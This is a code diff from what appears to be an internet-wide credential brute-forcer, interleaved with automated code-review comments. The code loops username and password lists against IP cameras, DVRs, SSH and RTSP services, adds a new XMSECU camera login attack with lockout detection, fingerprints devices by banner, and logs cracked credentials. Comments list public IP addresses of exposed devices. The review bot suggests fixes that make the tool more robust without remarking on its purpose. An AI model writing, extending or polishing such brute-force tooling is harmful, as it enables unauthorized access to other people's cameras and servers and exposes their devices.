rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); + ++passCounter; Sleep(200); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); + return lps; } @@ -467,6 +445,7 @@ int rvi_login_ptr(const char *sDVRIP, int wDVRPort, const char *login, const cha return -1; } +#include "Utils.h" lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) { lopaStr lps = { "UNKNOWN", "", "" }; 
@@ -475,18 +454,15 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) strcpy(ip, sDVRIP); int rowIndex = -1; - char login[64] = { 0 }; - char pass[64] = { 0 }; + char login[32] = { 0 }; + char pass[32] = { 0 }; for (int i = 0; i < MaxLogin; ++i) { + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); for (int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); if (!globalScanFlag) return lps; - /*ZeroMemory(login, 64); - ZeroMemory(pass, 64);*/ - login[0] = 0; - pass[0] = 0; - strcpy(login, loginLst[i]); strcpy(pass, passLst[j]); if (strlen(login) > 8) break; 
@@ -496,39 +472,20 @@ lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) strcpy(lps.login, login); strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; } - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); + ++passCounter; Sleep(200); } } - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); + return lps; } diff --git a/IPCAuth.cpp b/IPCAuth.cpp index 6abf528..641350b 100644 --- a/IPCAuth.cpp +++ b/IPCAuth.cpp 
@@ -6,14 +6,15 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie) { lopaStr lps = {"UNKNOWN", "", ""}; - bool result = true; + int result = 0; char login[128] = {0}; char pass[128] = {0}; char request[1024] = {0}; int passCounter = 1; int rowIndex = -1; - std::vector negVector; + std::vector negVector; + std::vector slideVector; if(strcmp(SPEC, "IPC") == 0) { negVector.push_back("Invalid"); @@ -91,6 +92,11 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c { negVector.push_back("Invalid credentials"); } + else if (strcmp(SPEC, "XMSECU") == 0) + { + slideVector.push_back("errornumber=-1"); + negVector.push_back("Log in failed"); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); @@ -101,22 +107,20 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c for(int i = 0; i < MaxLogin; ++i) { if(!globalScanFlag) break; - if(strcmp(loginLst[i], " ") == 0) continue; - //ZeroMemory(login, sizeof(login)); - login[0] = 0; - strcpy(login, loginLst[i]); + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); + if(strcmp(login, " ") == 0) continue; for(int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); if(!globalScanFlag) break; if(strcmp(passLst[j], " ") == 0) continue; + result = 0; - //ZeroMemory(pass, sizeof(pass)); - pass[0] = 0; strcpy(pass, passLst[j]); - //ZeroMemory(request, sizeof(request)); + ZeroMemory(request, sizeof(request)); request[0] = 0; if(strcmp(SPEC, "IPC") == 0) { 
@@ -191,7 +195,6 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c } else if (strcmp(SPEC, "JUAN") == 0) { - //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693", sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", ip, login, pass); } @@ -226,6 +229,12 @@ Content-Disposition: form-data; name=\"password\"\r\n\ Content-Length: %d\r\n\r\n\ %s", cl, tempPostData); } + else if (strcmp(SPEC, "XMSECU") == 0) + { + doPost = true; + sprintf(request, "%s/Login.htm", ip); + sprintf(postData, "command=login&username=%s&password=%s", login, pass); + } std::string buffer; if (cookie->size() > 0) { 
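Review bot: The new XMSECU branch in `IPC::IPCBrute` formats into `request` and `postData` with unbounded `sprintf`; `login` and `pass` are 128 bytes each in this function, so `postData` has to hold roughly 290 bytes, and its declaration is outside the hunk. Prefer a bounded call, e.g. `snprintf(postData, sizeof(postData), "command=login&username=%s&password=%s", login, pass);` (assuming `postData` is an array rather than a pointer). The same applies to `sprintf(request, "%s/Login.htm", ip);` against `request[1024]`.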
@@ -241,65 +250,53 @@ Content-Length: %d\r\n\r\n\ } if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } else if (res != -1) { + for (int i = 0; i < slideVector.size(); ++i) + { + if (Utils::ustrstr(buffer, slideVector[i]) != -1) + { + result = -1; + break; + }; + } + if (-1 == result) { + passCounter += MaxPass - 1; + break; + } + for (int i = 0; i < negVector.size(); ++i) { if (Utils::ustrstr(buffer, negVector[i]) != -1) { - result = false; + result = 1; break; }; }; - if (result) + if (0 == result) { - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); + strcpy(lps.login, login); + strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; - }; + } } else { return lps; } - - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(100); }; }; - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", 
rowIndex); return lps; } diff --git a/MainStarter.cpp b/MainStarter.cpp index 8ba17ea..e52e4f0 100644 --- a/MainStarter.cpp +++ b/MainStarter.cpp @@ -1399,7 +1399,7 @@ void MainStarter::runAuxiliaryThreads() { void MainStarter::createResultFiles() { char fileName[256] = { 0 }; - sprintf(fileName, "./result_files-%s", Utils::getStartDate().c_str()); + sprintf(fileName, "./" DIR_NAME "%s_%s", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) bool res = CreateDirectoryA(fileName, NULL); if (!res) { @@ -1484,6 +1484,10 @@ void MainStarter::start(const char* targets, const char* ports) { thread_setup(); + + QString fileSuffix = QString(targets); + fileSuffix = fileSuffix.mid(fileSuffix.lastIndexOf("/") + 1); + Utils::setCurrentTarget(fileSuffix.toUtf8().constData()); createResultFiles(); if (loadTargets(targets) == -1 || diff --git a/SSHAuth.cpp b/SSHAuth.cpp index 123021e..d80db76 100644 --- a/SSHAuth.cpp +++ b/SSHAuth.cpp @@ -83,19 +83,15 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return 0; } -int check_ssh_pass(const int rowIndex, const char *user, const char *pass, +int check_ssh_pass(int rowIndex, const char *user, const char *pass, const char *userPass, const char *host, int port, std::string *buffer, const char *banner) { int res = _sshConnect(user, pass, host, port); if(res == 0) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK"); - } + rowIndex = Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex); + buffer->append(userPass); buffer->append("@"); buffer->append(host); 
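Review bot: The new `slideVector` loop in `IPC::IPCBrute` declares `int i` inside the outer `for(int i = 0; i < MaxLogin; ++i)` loop, shadowing the login index, and compares that `int` with the unsigned `slideVector.size()`. Use a distinct, correctly typed index, `for (size_t k = 0; k < slideVector.size(); ++k)`, and do the same for the `negVector` loop below it. `result` now carries three meanings as bare `0`, `1` and `-1`; a small enum, or a comment at `int result = 0;`, would document them.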
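Review bot: In `MainStarter::createResultFiles`, `sprintf` now appends `Utils::getCurrentTarget()` to the path written into `char fileName[256]`, and the second MainStarter.cpp hunk shows that value is taken from the caller-supplied `targets` string after its last `/` with no length limit. A long target overruns the stack buffer; use `snprintf(fileName, sizeof(fileName), "./" DIR_NAME "%s_%s", ...)` and check the return value for truncation. The suffix is also used as a directory name unfiltered, so characters that are invalid or special in paths (for example `\` or `:` on Windows) should be replaced before `Utils::setCurrentTarget` stores it.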
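Review bot: `check_ssh_pass` (SSHAuth.cpp) takes `rowIndex` by value, so `rowIndex = Utils::addBARow(...)` only updates the local copy and the caller never sees the returned row; `const` was dropped from the parameter just to allow that assignment. Either keep `const int rowIndex` and call `Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex);` without assigning, or take `int &rowIndex` if the caller is meant to track the row. The rest of the function is outside this hunk.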
@@ -132,61 +128,29 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner strncpy(login, temp, ptr1 - temp); strcpy(pass, ptr1 + 1); - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(host) + ":" + QString::number(port), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; res = check_ssh_pass(rowIndex, login, pass, temp, host, port, buffer, banner); - //ZeroMemory(login, sizeof(login)); - //ZeroMemory(pass, sizeof(pass)); - //ZeroMemory(temp, sizeof(temp)); - login[0] = 0; - pass[0] = 0; - temp[0] = 0; if(res == 0) { if (i == 0) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAILHIT"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT", rowIndex); return -2; //Failhit } return 1; } else if(res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); return -2; }; Sleep(500); }; - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); 
return -1; } diff --git a/Utils.cpp b/Utils.cpp index 002a07c..0120a95 100644 --- a/Utils.cpp +++ b/Utils.cpp @@ -1,8 +1,10 @@ #include "Utils.h" #include +#include "STh.h" std::string Utils::startDate; std::string Utils::startTime; +std::string Utils::currentTarget; //void Utils::emitScaryError() { // __asm{ @@ -45,26 +47,44 @@ std::string Utils::getHeaderValue(std::string *buff, const std::string headerVal } void Utils::saveStartDate() { QDate date = QDate::currentDate(); - startDate = std::to_string(date.day()) - + "_" - + std::to_string(date.month()) - + "_" - + std::to_string(date.year()); + startDate = date.toString("dd.MM.yyyy").toUtf8().constData(); } + void Utils::saveStartTime() { QTime time = QTime::currentTime(); - startTime = std::to_string(time.hour()) - + "_" - + std::to_string(time.minute()); + startTime = time.toString("HH_mm").toUtf8().constData(); } std::string Utils::getStartDate() { return startDate; } +int Utils::addBARow(QString str1, QString str2, QString str3, int rowIndex) { + if (BALogSwitched) { + if (rowIndex == -1) { + rowIndex = nesca_3::addBARow(str1, str2, str3); + } + else { + stt->doEmitionChangeBARow(rowIndex, str2, str3); + } + + return rowIndex; + } + + return -1; +} + std::string Utils::getStartTime() { return startTime; } +void Utils::setCurrentTarget(const std::string target) { + currentTarget = target; +} + +std::string Utils::getCurrentTarget() { + return currentTarget; +} + int Utils::isDigest(const std::string *buffer) { if (Utils::ustrstr(buffer, "401 authorization") != -1 || Utils::ustrstr(buffer, "401 unauthorized") != -1 diff --git a/Utils.h b/Utils.h index 83235ce..b7041de 100644 --- a/Utils.h +++ b/Utils.h @@ -28,6 +28,7 @@ private: class Utils { private: static std::string startDate; private: static std::string startTime; +private: static std::string currentTarget; public: static int isDigest(const std::string *buffer); 
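Review bot: With the `login[0] = 0; pass[0] = 0; temp[0] = 0;` resets removed, nothing in the visible SSHBrute loop terminates `login` after `strncpy(login, temp, ptr1 - temp)`, and `strncpy` adds no terminator when the count is shorter than the source. If `login` is declared outside the loop (its declaration is not in the hunk), the tail of a longer earlier entry stays in the buffer and `QString(login)` reads it. Terminate explicitly with `login[ptr1 - temp] = '\0';` after checking that `ptr1 - temp` is smaller than `sizeof(login)`; `strcpy(pass, ptr1 + 1)` needs the same bound.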
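Review bot: `Utils::addBARow` returns -1 without touching the table whenever `BALogSwitched` is false, so the final status rows that callers used to write unconditionally ("OK", "FAIL", "404") are now dropped while the log view is switched off. If that is intended, say so on the function, e.g. `// Adds or updates a row only while the BA log is enabled; returns the row index, or -1 when logging is off.` The three `QString` parameters are taken by value; `const QString &` avoids a copy per argument on every call. The helper also ties Utils.cpp to `nesca_3` and the global `stt`, which is why the first hunk has to add `#include "STh.h"`.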
@@ -53,7 +54,7 @@ public: else return -1; } - template static int ustrstr(const T *str1, + template static int ustrstr(T *str1, const char* str2c, const locale& loc = locale()) { @@ -91,7 +92,10 @@ public: static void saveStartTime(); static std::string getStartDate(); static std::string getStartTime(); + static void setCurrentTarget(const std::string target); + static std::string getCurrentTarget(); static void emitScaryError(); + static int addBARow(QString str1, QString str2, QString str3, int rowIndex); static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName); }; diff --git a/WebformWorker.cpp b/WebformWorker.cpp index a98db13..34e04a2 100644 --- a/WebformWorker.cpp +++ b/WebformWorker.cpp @@ -83,17 +83,7 @@ lopaStr WFClass::doGetCheck(const char *ip, Connector con; if(con.nConnect(nip, port, &buffer) <= 0) return result; - if (BALogSwitched) { - if (rowIndex == -1) { - //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port), - // QString(login) + ":" + QString(pass), - // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); result = parseResponse(ip, port, &buffer, formVal, login, pass); if(i == 0) ++i; 
@@ -144,18 +134,8 @@ lopaStr WFClass::doPostCheck(const char *ip, std::string buffer; Connector con; if (con.nConnect(nip, port, &buffer, postData) <= 0) return result; - - if (BALogSwitched) { - if (rowIndex == -1) { - //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port), - // QString(login) + ":" + QString(pass), - // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - } + + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; return parseResponse(ip, port, &buffer, formVal, login, pass); diff --git a/finder.cpp b/finder.cpp index d1ff65a..1bebaab 100644 --- a/finder.cpp +++ b/finder.cpp 
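Review bot: `passCounter` is advanced twice per request in doPostCheck: once by the `++passCounter` embedded in the percentage argument of `Utils::addBARow(...)` and again by the `++passCounter;` statement right after it, so the reported percentage runs at double speed. Before this change the embedded increment only ran when the log was enabled and a row already existed. Compute the percentage from the current value, `QString::number((passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100)`, and keep the single statement. The doGetCheck hunk above carries the same side effect inside its argument list; both functions continue outside their hunks.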
@@ -248,21 +248,28 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c } } - std::size_t ptr1 = buff->find("\r\n\r\n"); - if (ptr1 != -1) { - int sz = buff->size(); - int nSz = buff->substr(ptr1, sz).size() - 4; - if (nSz < 100) { - if (gNegDebugMode) - { - QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); - stt->doEmitionDebugFoundData("[" + QString(ip) + - "]\tNegative hit: Size:" + QString::number(nSz)); - } - return true; - } - } + //if (buff->size() < 200) { + // if (buff->find("rtsp") == -1) { + // std::size_t ptr1 = buff->find("\r\n\r\n"); + // if (ptr1 != -1) { + // int sz = buff->size(); + // int nSz = buff->substr(ptr1, sz).size() - 4; + // if (nSz < 100) { + // if (gNegDebugMode) + // { + // QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); + // stt->doEmitionDebugFoundData("[" + QString(ip) + + // "]\tNegative hit: Size:" + QString::number(nSz)); + // } + + // ++filtered; + // return true; + // } + // } + // } + //} + return false; } int globalSearchPrnt(const std::string *buff) @@ -391,7 +398,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const if(Utils::ustrstr(buffcpy, "hikvision-webs") != -1 || ( (Utils::ustrstr(buffcpy, "hikvision digital") != -1 || Utils::ustrstr(buffcpy, "doc/page/login.asp") != -1) - && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1) + && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1 || Utils::ustrstr(buffcpy, "DNVRS-Webs") != -1) || (Utils::ustrstr(buffcpy, "lapassword") != -1 && Utils::ustrstr(buffcpy, "lausername") != -1 
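Review bot: The size-based check in isNegative is disabled by commenting out some twenty lines instead of deleting them, which leaves dead code that still mentions `filtered` and an unused `nCodec`. Delete the block and rely on version control, or, if it is meant to come back, put it behind a named switch with a one-line comment saying why it is off. isNegative starts outside the hunk.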
@@ -463,10 +470,12 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1 ) return 57; //Network video client (http://203.190.113.54:60001/) if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm) - if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam) + if (Utils::ustrstr(buffcpy, "RTSP/1.") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam) if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi) if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/) - + if (Utils::ustrstr(buffcpy, "NetSuveillanceWebCookie") != -1 && + Utils::ustrstr(buffcpy, "resizeL") != -1) return 62; //XMSECU (http://121.72.179.76/Login.htm) + //if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/) if (Utils::ustrstr(buffcpy, "nas - ") != -1 
@@ -597,12 +606,12 @@ int __checkFileExistence(int flag) { char fileName[64] = {0}; - if (flag == -22) sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str()); - else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str()); - else if (flag == 3) sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str()); - else if (flag == 16) sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str()); + if (flag == -22) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 3) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 16) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); else if(flag >= 17 || flag == 11 || flag == 12 - || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str()); + || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); FILE *f = fopen(fileName, "r"); if(f == NULL) return true; 
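Review bot: The flag-to-file mapping in `__checkFileExistence` does not agree with the one in `fputsf` (next hunk): here flag 3 selects `TYPE2`, flag 16 selects `TYPE4` and flag 1 falls into the `TYPE3` branch, while `fputsf` sends flag 3 to `TYPE4`, flag 1 to `TYPE2` and lists flag 2 in its `TYPE3` branch. The existence check can therefore look at a different file from the one being appended to. Both functions should take the name from one shared helper, e.g. `static const char *typeForFlag(int flag)`. The function is also declared `int` but returns `true`; its body continues outside the hunk.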
@@ -620,44 +629,39 @@ bool ftsBA = true; std::atomic fOpened(false); void fputsf(char *text, int flag) { - FILE *file = NULL; - char fileName[256] = { 0 }; if(flag == 0 || flag == 15 || flag == -10) { - if (ftsCameras) ftsCameras = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + if (ftsCameras) ftsCameras = __checkFileExistence(flag); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == 1) { if(ftsOther) ftsOther = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == -22) { if(ftsSSH) ftsSSH = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == 3) { if(ftsFTP) ftsFTP = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag >= 17 || flag == 11 || flag == 12 || flag == 13 || flag == 14 || flag == 2 ) { if(ftsBA) ftsBA = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else stt->doEmitionRedFoundData("Unknown flag [FLAG: " + QString::number(flag) + "]"); + FILE *file 
= fopen(fileName, "a"); + if(file != NULL) { time_t rtime; @@ -874,7 +878,7 @@ void _specFillerCustom(const char *ip, int port, const char *finalstr, const cha if (strlen(login) > 0 || strlen(pass) > 0) { - sprintf(log, "%s:%s (%s:%s) T: %s\n", + sprintf(log, "%s: %s (%s:%s) T: %s\n", classString, ip, ip, login, pass, finalstr); } @@ -911,20 +915,20 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l if (strlen(login) > 0 || strlen(pass) > 0) { if (8 == offset) { - sprintf(log, "[BA]:%s:%s@%s T: %s\n", + sprintf(log, "[BA]: %s:%s@%s T: %s\n", login, pass, ip + offset, login, pass, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s:%s@%s T: %s\n", + sprintf(log, "[BA]: %s:%s@%s T: %s\n", login, pass, ip + offset, login, pass, ip + offset, finalstr); } } else { if (8 == offset) { - sprintf(log, "[BA]:%s T: %s\n", + sprintf(log, "[BA]: %s T: %s\n", ip + offset, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s T: %s\n", + sprintf(log, "[BA]: %s T: %s\n", ip + offset, ip + offset, finalstr); } } @@ -942,15 +946,15 @@ void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char if (strlen(login) > 0 || strlen(pass) > 0) { - sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n", - ip, port, login, pass, finalstr); + sprintf(log, "[RSTP]: %s11 (%s:%s) T: %s\n", + ip, ip, login, pass, finalstr); } else { - sprintf(log, "[RSTP]:%s:%d T: %s\n", - ip, port, finalstr); + sprintf(log, "[RSTP]: %s11 T: %s\n", + ip, ip, finalstr); } - stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4"); + stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "3090C7"); fputsf(log, flag); } 
@@ -1384,10 +1388,12 @@ int _specRTSPBrute(const char *ip, int port, return -1; } - if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + if (strstr(lps.login, "UNKNOWN") == NULL) { - _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP"); + char title[512] = { 0 }; + sprintf(title, "%s %s", lps.other, finalstr); + _specFillerRSTP(ip, port, title, lps.login, lps.pass, flag); + //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP"); }; } @@ -2677,7 +2683,7 @@ std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems * int portPos = location.find(":", 7); if (-1 != portPos) { - int portPosEnd = location.find("/ \n>\"'", portPos); + int portPosEnd = location.find_first_of("/ \n>\"'", portPos); if (-1 != portPosEnd) { newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); if (gDebugMode) { @@ -2898,6 +2904,9 @@ std::string getHeader(const std::string *buffcpy, const int flag) { return "[IOmega NAS]"; } } + else if (STRSTR(buffcpy, "x-rtsp-tunnelled") != -1 || STRSTR(buffcpy, "rtsp://") != -1) { + return "[RTSP]"; + } else { std::string tempBuff = buffcpy->c_str(); const std::string &result_ref = getTitle(tempBuff.c_str(), flag); @@ -3013,7 +3022,7 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con HikVis::hikCounter = 0; HikVis::hikPart++; } - sprintf(fileName, "./result_files-%s/hikkafile_%s_part_%d.csv", date, date, HikVis::hikPart); + 